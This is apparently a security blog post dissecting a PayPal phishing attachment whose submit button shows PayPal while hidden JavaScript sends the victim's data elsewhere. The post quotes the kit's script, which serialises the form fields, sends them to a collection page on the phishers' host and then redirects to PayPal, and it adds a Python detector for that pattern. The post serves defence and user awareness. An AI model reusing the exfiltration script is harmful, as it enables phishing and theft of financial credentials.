I received what at first glance looked like a “normal” PayPal phishing email. It looked like a typical email from a clueless phisher, using one of the phishing kits, with a standard email with an HTML form attachment. OK, nothing weird or different, except all the obvious links in the HTML go to genuine PayPal sites.

The phishers are using a hidden JavaScript redirect method to steal the data, while the submit button still shows as going to PayPal.com. This is extremely dangerous, and it is very difficult for an average user to defend against it or to know that they are passing information to a criminal.

We always tell users to hover the mouse over a link or submit button and make sure that the link is to the correct “safe” location. This is no longer safe advice when hidden JavaScript redirection is used. The only saving grace with this particular phishing attack is that the phishing page is an HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give, to NOT open any attachments to emails and definitely not to fill in HTML form attachments, should protect you. But once a phisher puts this onto a website with a plausible and believable URL, all bets are off and it will be almost impossible to detect the phish. This is very worrying.

The email looks like:

From: PayPal <[email protected]>
Date: Sun 12/06/2021 18:10
Subject: Review your PayPal account limited statement
Attachment: Issue ID Number PP 8400-7911-20-00.html

Body Content:

Review your PayPal account limited statement
Dear PayPal Customer,

We understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.

As part of our security measures, we regularly check the PayPal screen activity. We request information from you for the following reason:

Our system detected unusual charges to a credit card linked to your PayPal account.

Download the attached form to verify your Profile information and restore your account access. And make sure you enter the information accurately, and according to the formats required. Fill in all the required fields.

Thanks for joining the millions of people who rely on us to make secure financial transactions around the world.


That all looks typical so far, so let’s look at the attachment in a browser and see where the submit button takes us, so we can report it. Ah, says me, scratching my head, the submit button goes to the genuine PayPal site, albeit the Israeli version.

<form class="safeSubmit multiplesubmitform" method="post" id="signup_form" name="signup_form" action=""><fieldset class="error"><legend class="accessAid">SignUp Form</legend>

So think, the phishers cannot be that clueless that they have taken a genuine PayPal email and forgotten to change the submit link, can they? So look deeper and see the CSS & JS files at the top of the HTML code page that definitely do not belong to PayPal.

<link rel="stylesheet" href="http://www.egypt-trips.co/wp-admin/includes/New/css/default.css" />
<script type="text/javascript" src="http://www.egypt-trips.co/wp-admin/includes/New/js/jquery.ba-hashchange.min.js"></script>
<script type="text/javascript" src="http://www.egypt-trips.co/wp-admin/includes/New/js/default.js"></script>
Ah, bells ring & gears click into place, says me. “I can see what they are doing”. The JavaScript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to PayPal.com and diverts them to the actual phishing page to accept all your details, while your browser still goes to the genuine PayPal page, if you are unwise enough to fall for this trick.

The important sections of the default.js file, the ones that actually perform the hidden/silent phishing redirect, are shown below: they make the submit button go to PayPal.com while silently sending the entered data to the phishers’ website at the same time. This fools the majority of anti-phishing techniques and protections, including most toolbars, phishing filters and antivirus products, which currently only look at the URL for the submit button and don’t examine the linked JavaScript files.

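// collection endpoint on the phishers' site, and the genuine site the victim is sent to afterwards
data_receiver_url = 'http://www.egypt-trips.co/wp-admin/includes/New/post_data.php',
redirect_url = 'https://www.paypal.com/';
//setup page layout based on hashes
var hash = location.hash;
var current_page = hash || '#signup';
//$('div[data-page!=signup]').css('background-color', 'red');
// <snip>
submitHandler: function(form, validator) {
    // serialise every field of the submitted form
    cc_data = $(form).serialize();
    // pass the data to the collection endpoint as a query string, via the src of the #target element
    $('#target').attr('src', data_receiver_url+'?'+cus_data+'&'+cc_data);
    // then navigate the browser to the genuine site
    document.location.href = redirect_url;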
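
An added example, not part of the original post or of the kit: a Python check for HTML attachments that looks past the form action to the hosts serving the linked scripts and stylesheets, and at the serialize-then-send pattern shown in default.js. The host kit-host.example, the sample HTML and JS, and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class _Collector(HTMLParser):
    """Collect form action URLs and external script/stylesheet URLs."""
    def __init__(self):
        super().__init__()
        self.actions, self.resources = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "script" and a.get("src"):
            self.resources.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.resources.append(a["href"])

def _site(url):
    """Last two host labels: a rough stand-in for the registrable domain."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])

# Form fields serialised, then placed in a src attribute or followed by a redirect.
EXFIL_JS = re.compile(
    r"\.serialize\(\).*?(\.attr\(\s*['\"]src['\"]|location\.href\s*=)", re.S)

def audit_attachment(html, scripts=None):
    """Return findings; `scripts` maps a script URL to its fetched source text."""
    c = _Collector()
    c.feed(html)
    form_sites = {_site(u) for u in c.actions if _site(u)}
    findings = [("foreign-resource", u) for u in c.resources
                if _site(u) and _site(u) not in form_sites]
    findings += [("serialize-then-send", u) for u, src in (scripts or {}).items()
                 if EXFIL_JS.search(src)]
    return findings

# Constructed sample modelled on the attachment described above.
SAMPLE_HTML = '''<link rel="stylesheet" href="http://kit-host.example/css/default.css" />
<script type="text/javascript" src="http://kit-host.example/js/default.js"></script>
<form method="post" id="signup_form" action="https://www.paypal.com/"></form>'''
SAMPLE_JS = {"http://kit-host.example/js/default.js":
             "cc_data = $(form).serialize();\n$('#target').attr('src', u + '?' + cc_data);"}

if __name__ == "__main__":
    for kind, url in audit_attachment(SAMPLE_HTML, SAMPLE_JS):
        print(kind, url)
```

The two-label comparison misreads hosts under multi-label suffixes such as co.uk and will flag a brand's own separate asset domains, so a production filter would use the Public Suffix List and an allow-list.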

This is the HTML page as seen using Firefox with no script, so JavaScript won’t run and you can see what information they want:
[Screenshot: PayPal phish seen in Firefox with no script]
The same page seen in Internet Explorer:
[Screenshot: PayPal phish seen in Internet Explorer]
Just in case the phishing site gets taken down quickly, I have attached the HTML page & the JS files that were downloaded from www.egypt-trips.co in a zip for researchers to investigate further (usual password) HERE

Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of phishing attacks yesterday, we would be in trouble, because users wouldn’t realise that they were giving their details to a phisher.

Luckily enough, there are enough warning bells with this particular one to prevent most people falling for it, but some always do.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.

All of these emails use social engineering tricks to persuade you to open the attachments that come with the email or click the link in the email. It might be a message saying “look at this picture of me I took last night” that appears to come from a friend, or something more targeted at somebody who is regularly likely to receive PDF attachments, Word .doc attachments or any other common file that you use every day. Or it might be a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details.

Be very careful when unzipping them and make sure you have “show known file extensions” enabled, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.